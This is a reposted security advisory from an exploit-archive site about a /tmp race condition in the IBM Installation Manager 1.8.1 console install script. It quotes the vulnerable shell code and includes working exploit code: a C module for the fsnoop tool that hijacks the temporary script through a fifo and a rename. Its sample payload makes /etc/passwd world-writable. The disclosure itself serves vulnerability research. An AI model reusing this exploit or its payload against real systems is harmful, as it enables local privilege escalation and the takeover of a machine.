首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IBM Installation Manager 1.8.1 Race Condition
来源:@_larry0 作者:Cashdollar 发布时间:2015-11-12  
Title: /tmp race condition in IBM Installation Manager V1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 0000-00-00
Vendor Contact:
Description: IBM Installation Manager is a command line utility to install
various software packages developed by IBM.

=====> IBM Installation Manager> Password required

Credentials are required to connect to the IBM download site. Enter IBM ID
and password.

Select:
     P. Provide credentials and connect
     C. Cancel

Select 'P' to enter credentials and connect, or 'C' to cancel.

  Forgot your IBM ID?
    https://www.ibm.com/account/profile?page=forgotuid
  Forgot your password?
    https://www.ibm.com/account/profile?page=forgot
  IBM ID help and FAQ
    https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
Vulnerability:
I noticed a /tmp race condition in IBM�s installation manager software
install script
The code in consoleinst.sh is:


 46 TEMP=/tmp
 47 tempScript=$TEMP/consoleinst-$.sh
 48 scriptLoc=`dirname "___FCKpd___0"`
 49 slash=`expr "$scriptLoc" : "\(/\)"`
 50 if [ "X$slash" != "X/" ]; then
 51         scriptLoc=`pwd`/$scriptLoc
 52 fi
 53 
 54 if [ "___FCKpd___0" != "$tempScript" ]; then
 55     cp "___FCKpd___0" "$tempScript"
 56     cd "$TEMP"
 57     origScriptLoc=$scriptLoc
 58     export origScriptLoc
 59     exec "$tempScript" $@
 60     # should not return from above exec
 61     exit 1
 62 fi


If you guess the pid and create the file before the installer script does
you can inject code to be executed at line 59.

This is a log of me controlling permissions of the file during installation
of the product:

[M] -rwxrwxrwx 1 larry larry 34  Thu Oct 29 21:46:10 2015
/tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0  Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225  Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh

If I'm able to write to that file directly after it's modifed (inotify() for
the win) I could inject commands into that installation script.
CVEID:
OSVDB:
Exploit Code:
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for
pointing me
at his /tmp race condition tool l0pht-watch.
 
@v14dz
http://vladz.devzero.fr/
 
$ make ibm-console.so
 
/tmp/x is :
 
#!/bin/sh
chmod 777 /etc/passwd
 
$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]
file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.
 
ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22  2014 /etc/passwd
 
*/
 
 
 
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
 
char title[] = "** IBM Console Install Exploit **";
 
/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[]      = "/tmp/consoleinst-HEREPID.sh";
 
/* Evil routines */
void payload() { 
  int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after
the cp command*/
  mkfifo(file, 0666);
  fd = open(file, O_RDONLY);
  rename(file, "/tmp/a");
  rename("/tmp/x", file);
}
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=156



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jenkins 1.633 - Unauthenticate
·FBZX 2.10 - Local Stack-Based
·Huawei HG630a and HG630a-50 -
·TACK 1.07 - Local Stack-Based
·POP Peeper 4.0.1 - SEH Over-Wr
·TUDU 0.82 - Local Stack-Based
·WordPress Ajax Load More PHP U
·Sam Spade 1.14 - S-Lang Comman
·QNap QVR Client 5.1.0.11290 -
·vBulletin 5.1.2 Unserialize Co
·China Chopper Caidao PHP Backd
·Idera Up.Time Monitoring Stati
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved